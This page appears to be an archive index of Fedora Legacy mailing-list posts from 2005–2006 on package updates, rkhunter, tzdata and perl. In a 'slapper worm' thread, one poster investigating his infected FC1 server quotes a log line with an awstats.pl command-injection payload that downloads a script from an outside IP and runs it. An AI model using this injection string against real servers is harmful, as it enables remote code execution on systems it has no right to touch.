Re: What we're forgetting . . .

2006-06-14 Thread Michael Mansour
David Eisenstein wrote: As we continue to talk over where Fedora Legacy is going, and what distros should or shouldn't be maintained by us, it occurs to me that we are forgetting some important things * How many contributors do we have now that get the work of Fedora

Re: RKHUNTER reporting on my system

2006-04-12 Thread Michael Mansour
kles koe wrote: why don't you just ask the author of rkhunter to update the hashes for these packages? i think i did once and it was fixed within a few days. I said I already reported this issue twice, but so far I haven't received any reaction and the latest version of the hashes

Re: New sendmail and missing /usr/lib/sendmail

2006-03-25 Thread Michael Mansour
Hi Eric, Quoting Michal Jaegermann [EMAIL PROTECTED]: I am not sure in which distro /usr/sbin/alternatives showed up for the first time. It first showed up in RHL 7.3 as far as RHL goes. It originated in debian though... *** ERROR: FEATURE() should be before MAILER() *** ERROR:

Updated tzdata packages?

2006-03-20 Thread Michael Mansour
Hi, I'm just wondering has anyone considered updating the tzdata package for FC1/2? In Australia for example, our Daylight savings time changed due to the Commonwealth games. Red Hat have released updates for their distributions, but looking at FC1/2: FC1# tzdata-2004b-1.fc1 FC2#

Re: slapper worm

2006-01-24 Thread Michael Mansour
Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really

Re: slapper worm

2006-01-24 Thread Michael Mansour
Hi Mike, You should do a netstat -na | grep SYN, if you see a lot of those then slapper is there DOS attacking people. $ netstat -na | grep SYN $ Thanks for the advice. But, as I am behind a stealth firewall, I feel relatively secured against *this* type of attack. Umm, what does

slapper worm

2006-01-23 Thread Michael Mansour
Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache SSL server which

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi James, Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi Kelson, Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi Marc, On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1

Re: Need discussion, Re: Latest contrib perl

2005-12-28 Thread Michael Mansour
Hi David, Hi John, Michael Mansour wrote: The perl versions I'm currently using on FC1 are from that directory: # rpm -q perl perl-suidperl perl-5.8.3-18.1.legacy perl-suidperl-5.8.3-18.1.legacy I built these versions for FC1; however, they are actually older

Re: Need discussion, Re: Latest contrib perl

2005-12-27 Thread Michael Mansour
Hi John, Michael Mansour wrote: The perl versions I'm currently using on FC1 are from that directory: # rpm -q perl perl-suidperl perl-5.8.3-18.1.legacy perl-suidperl-5.8.3-18.1.legacy I built these versions for FC1; however, they are actually older than the -17.3.legacy versions

Latest contrib perl

2005-12-26 Thread Michael Mansour
Hi, I'm trying to apply the latest contrib perl from: http://www.fedoralegacy.org/contrib/perl/ namely: perl-5.8.3-19.2.legacy.i386.rpm perl-suidperl-5.8.3-19.2.legacy.i386.rpm but I get the following result: # rpm -Uvh perl-suidperl-5.8.3-19.2.legacy.i386.rpm perl-5.8.3-19.2.legacy.i386.rpm

Re: CVE-2005-3962, Re: Perl Format String Vulnerability

2005-12-23 Thread Michael Mansour
Does this affect us? (1) HIGH: Perl Format String Vulnerability Affected: Perl versions 5.9.2 and 5.8.6 confirmed; potentially all Perl versions Webmin version 1.23 and prior Description: Perl is widely used as a scripting language for a variety of applications including

Re: PHP Attacks....

2005-11-09 Thread Michael Mansour
On Wed, 2005-11-09 at 13:27 -0700, Michal Jaegermann wrote: If I understand correctly that is really an XML_RPC vulnerability in pear libraries; so if you do not have such capability, or it is not turned on, then you are not vulnerable. Of course there are some applications which require

Re: Typo in yum instructions

2005-10-31 Thread Michael Mansour
Yes, although technically that's not the mirror, the true mirror is at http://dl.atrpms.net/mirrors/fedoralegacy/ including yum20 format headers. I wouldn't start changing content in a mirrored part :=) The problem is that yum-arch has a bug that breaks my yum20 repos:

Re: Thoughts about James' Updates on Legacy list

2005-09-29 Thread Michael Mansour
Josep L. Guallar-Esteve wrote: On Wednesday 28 September 2005 11:21, James Kosin wrote: I'm not knocking RedHat, Fedora or Fedora-Legacy this is a good point. But, some of us need more than just patches to get us by. I know, If you really want the latest, why not update to FC4... The